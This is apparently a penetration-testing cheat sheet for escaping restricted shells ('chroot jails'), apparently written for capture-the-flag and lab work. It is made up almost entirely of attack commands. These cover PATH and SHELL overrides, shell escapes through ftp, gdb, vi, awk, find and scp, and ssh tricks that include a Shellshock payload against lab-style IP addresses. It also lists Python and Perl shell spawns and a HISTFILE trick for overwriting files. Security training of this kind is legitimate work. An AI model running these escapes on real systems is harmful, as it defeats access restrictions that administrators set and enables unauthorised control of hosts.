CHROOT JAIL


======================================

|       BREAKING OUT OF SHELLCATRAZ          |

======================================

Run env to see the exported environment variables.

echo $PATH 

(Find out what path is giving you commands)

echo $SHELL

(Find out what terminal shell you are in)




=========================================

QUICK ESCAPES

=========================================

- If / is allowed in commands break out by doing

/bin/bash or /bin/sh

- If you can set PATH or SHELL variables do the below

export PATH=/bin:/usr/bin:$PATH

export SHELL=/bin/sh

- If you can copy files to the existing path do

cp /bin/sh /some/dir/from/PATH; sh




==========================================

BYPASS USING ANOTHER SERVICE

==========================================

ftp --> !/bin/sh

gdb --> !/bin/sh

more / less / man --> !/bin/sh

vi / vim --> :!/bin/sh

scp --> scp -S /tmp/GetMeOut.sh x y:

awk --> awk 'BEGIN {system("/bin/sh")}'

find --> find / -name someName -exec /bin/sh \;




==========================================

GO IN WITH OUTSIDE HELP

==========================================

ssh restricted@10.10.10.122 -t "/bin/sh"

ssh restricted@10.10.10.123 -t "bash --noprofile"

ssh restricted@10.10.10.124 -t "() { :; }; /bin/bash"




==========================================

INVOKE SHELL THROUGH SCRIPTING LANG

==========================================

python -c 'import os; os.system("/bin/bash")'

perl -e 'exec "/bin/sh";'

echo 'Malicious code' | tee scripts.sh




==========================================

HISTORY FILE TRICK

==========================================

Set HISTFILE variable to a file you want to overwrite

Set HISTSIZE variable to 0 and then immediately to 100

Execute lines that you want written to the file

Log out and log back in